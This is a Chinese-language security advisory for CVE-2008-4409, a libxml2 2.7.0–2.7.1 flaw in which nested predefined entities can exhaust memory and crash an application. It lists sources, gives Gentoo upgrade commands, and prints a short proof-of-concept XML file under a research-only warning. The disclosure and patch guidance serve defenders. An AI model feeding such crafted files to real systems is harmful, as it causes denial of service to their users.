发布日期：2008-10-02
更新日期：2008-12-04

受影响系统：

XMLSoft Libxml2 2.7.1
XMLSoft Libxml2 2.7.0

不受影响系统：

XMLSoft Libxml2 2.7.2

描述：

---

BUGTRAQ  ID: 31555
CVE(CAN) ID: CVE-2008-4409

libxml2软件包提供允许用户操控XML文件的函数库，包含有读、修改和写XML和HTML文件支持。

libxml2没有正确地处理实体中的预定义实体定义，如果用户受骗打开了恶意的XML文件的话，就可能导致耗尽所有内存，应用程序会崩溃。

<*来源：Christian Weiske
  
  链接：http://secunia.com/advisories/32130
        http://bugs.gentoo.org/show_bug.cgi?format=multiple&id=239346
        http://bugzilla.gnome.org/show_bug.cgi?id=554660#c1
        http://security.gentoo.org/glsa/glsa-200812-06.xml
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?xml version='1.0' ?>
<!DOCTYPE test [
<!ENTITY ampproblem '&amp;'>
]>
<t a="&ampproblem;">a</t>

建议：

---

厂商补丁：

Gentoo
------
Gentoo已经为此发布了一个安全公告（GLSA-200812-06）以及相应补丁:
GLSA-200812-06：libxml2: Multiple vulnerabilities
链接：http://security.gentoo.org/glsa/glsa-200812-06.xml

所有libxml2用户都应升级到最新版本：

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.2-r1"

浏览次数：3492
严重程度：0（网友投票）